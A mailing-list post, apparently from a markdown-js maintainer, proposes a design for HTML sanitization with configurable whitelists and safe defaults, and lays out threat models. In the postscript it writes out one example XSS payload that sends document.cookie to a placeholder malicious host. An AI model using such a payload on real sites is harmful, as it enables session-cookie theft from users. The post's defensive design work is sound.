Hi. I'm going to add HTML sanitization to markdown-js, and I wanted to hear about other people's experience with this. This mail is long, should take about five minutes to read, but I'll be wasting a lot more time than five minutes if I go down a dead-end rabbit hole on this. From my comments on [the issue on GitHub][]: [the issue on GitHub]: https://github.com/evilstreak/markdown-js/issues/16#issuecomment-1681056 (issue 16 on markdown-js: "HTML support") (I've bolded some phrases below to facilitate skimming; hope it's not too annoying when you're reading straight through.) Okay, well, I guess I'm committed to implementing this, then. Here's what I'm thinking about how to do it. Is this a good way to do it? **I'd really appreciate comments** before I go haring off without the benefit of other people's advice and experience. * JsonML doesn't have a spec written in English, as far as I can tell, just a [BNF grammar][] and some example implementations in [XSLT][] and [JS with the DOM][DOM]. As far as I can tell, both of the example implementations unescape entity references on input and re-escape them on output, although there's no English text to explain whether this is intentional or a bug. I assert that **this is a bug**, because it robs JsonML of any way to represent SGML entity references. I propose that JsonML strings should be treated as PCDATA ? allowed to contain entities but not tags ? rather than CDATA (plain text) or HTML (text with entities and tags). [BNF grammar]: http://jsonml.org/ (The JSONML spec) [XSLT]: http://jsonml.org/JsonML.xslt [DOM]: http://jsonml.org/JsonML_DOM.js * Accordingly, when we *parse* a code block or inline code chunk, we should escape `&` and `<` in it, and when we parse any other node, we should run it through an HTML parser to break it down into subnodes, ensuring that it's well-formed, modulo possible references to entities that we don't know about. (I don't propose to include a list of all defined HTML entities into markdown-js.) This means that in general we will **not escape HTML on output**. It also means that the effect of poorly-nested input tags will be limited to at most one parse-tree node. * The HTML parser used as an input filter should be **configurable with whitelists** of tags, attributes per tag, and URL schemes per attribute. By default it should be configured with a fairly strict filter, blocking even inline images and iframes with off-host URIs, and of course any possible vector for JS. This will annoy people like cadorn, for whom such filtering is unnecessary, and they need to have an easy way to turn off the whitelists (if not the HTML parsing entirely). But I think that is better than someone doing a `git pull` on markdown-js and getting privacy and XSS problems added to their application. That is, **the default should be safe**. I'm **hoping I can use an existing pure-JS HTML parser** ? say, [jsdom][]'s, or [kn_htmlsafe_htmlSanitize][], or [NodeHtmlParser][] ? rather than hacking one together from scratch. (As a fallback, I could write a very simple parser for the tags-and-attributes subset of XHTML.) I'm a little worried about the performance implications of this; markdown-js is already a little slower than Showdown, and this could make the matter worse. Does **anybody have recommendations here?** (In the case where it's running in a modern browser, we could use `DOMParser` as an optimization, but enough people are using markdown-js in Node that I think it doesn't make sense to depend on that.) [jsdom]: https://github.com/tmpvar/jsdom (Elijah Insua's MIT-licensed pure-JS implementation of the W3C DOM) [kn_htmlsafe_htmlSanitize]: http://mod-pubsub.cvs.sourceforge.net/viewvc/mod-pubsub/mod_pubsub/js_pubsub/js/kn_htmlsafe.js?revision=1.2&view=markup (Ben Sittler's 3-clause BSD-licensed whitelisting, but not particularly configurable, pure-JS HTML sanitizer) [NodeHtmlParser]: https://github.com/kirbysayshi/node-htmlparser (A forgiving HTML/XML/RSS parser written in JS for both the browser and NodeJS) Other variations: 1. **Parse HTML on output**, not input, instead of building JsonML nodes in the intermediate representation. This has the disadvantage that it would make some kinds of processing on the intermediate representation harder ? for example, in [yamemex][], I want to support Twitter-style #hashtags, and that will be easier to do if I can tell which hash marks are in the text of the document and which are in some URL somewhere. Also, any markup added by intermediate-representation processing would be prone to being stripped by the output filter. The advantage is that it would probably make the intermediate processing run faster and take less memory, and it expands the HTML parsers that can be used beyond just those that build a parse tree, which is slow; HTML parsers that simply produce sanitized HTML could be used. Also, the intermediate representation would be simpler, since it wouldn't have HTML tag names in it. This would involve changing the intermediate "JsonML" representation to have HTML rather than CDATA or PCDATA contents ? so `&` would be represented as `&` in the intermediate representation, not as `&`, and `<b>` would mean `<b>`. 2. Leave the semantics of the intermediate representation unchanged aside from adding more tag names, parsing HTML on input and **using an exhaustive list of HTML entities** to convert things like `©` © and `‡` ‡ to Unicode characters. I think this would be a hassle to maintain. (Note that ‡ doesn't show up correctly here [clarification: on GitHub] because GitHub has undertaken to maintain such a list for their Markdown implementation ? and failed. Visit the URL `data:text/html,‡` to see that your browser supports it.) 3. Rather than parsing HTML on input or when rendering each node for output, pass through HTML tags from input to output (except inside code blocks, of course) and then run a final HTML-sanitizing pass on the output string to ensure that it's well-formed and safe. This has the advantage of very minimal coupling, and it would handle e.g. `<img src="http://webbugs.example.com/">` the same way regardless of whether it was generated from `![ ](http://webbugs.example.com/)` or just included literally in the source; the disadvantages are that it may be even slower than the other alternatives (making an additional pass over markup whose well-formedness and safety is guaranteed by construction), it could be a little more bug-prone ("Where did all of my `<ol>`s go? Oh, I left `ol` out of the whitelist."), and it doesn't facilitate intermediate processing in any way. [yamemex]: https://github.com/kragen/yamemex/tree/markdown-js (My project using markdown-js for, ultimately, social bookmarking.) So, **what do other people think?** The above represents a few hours of me thinking about the problem, but I anticipate that implementing it will take at least a few days of work, so I'd really appreciate help in thinking this through before I jump in. Kragen P.S. I guess I should elaborate a little bit on the kinds of use cases/threat models I'm thinking of here: 1. Using Markdown to write your own blog on your own domain, which is cadorn's use case. There's little benefit to filtering your markup in this case; the worst case is that your blog is formatted funny because you forgot to close a `<blockquote>` or something. Unless you copy and paste a chunk of HTML from somewhere else, which brings us to: 2. Using Markdown to render stuff pulled (manually or automatically) from another [origin][]. The risk here is that the author of the stuff may have included some code to take actions on your behalf and exfiltrate your private information (known as "cross-site scripting"), either in a straightforward way such as `<script>im=new Image(); im.src="http://malicious.example.com/?"+document.cookie</script>` or some more subtle way designed to evade na?ve filters. Doing this reliably requires that you use a whitelist rather than a blacklist so you don't end up like the [stupid losers who built MySpace][Samy]. [origin]: http://www.w3.org/Security/wiki/Same_Origin_Policy (As defined in the same-origin policy.) [Samy]: http://namb.la/popular/tech.html (Samy Kamkar explains the unbelievably incompetent security measures he hacked around to crash MySpace.) Note that this category includes things like blogging software where someone might plausibly copy and paste a piece of someone else's web page in order to quote it. 3. Using Markdown to render stuff sent by a possible spammer or by someone else who has an illegitimate interest in knowing whether you have read it ? such as email ? in which case you do *not* want to confirm to the spammer that you have read it. In this case want to filter out anything whose rendering will generate network traffic (to anywhere other than the source of the rendered document, that is), such as `<img src>` and `<iframe>`, as well as all the items covered in #2 above. I believe yamemex is in category 2, because I excerpt the pages I bookmark with it all the time. markdown-js is currently safe for this case because it escapes all HTML, but I want it to let through safe HTML. I think that almost any server-based web application that renders Markdown taken from client requests is in category 2, if not category 3, and I think (though I don't know) that many markdown-js applications do that.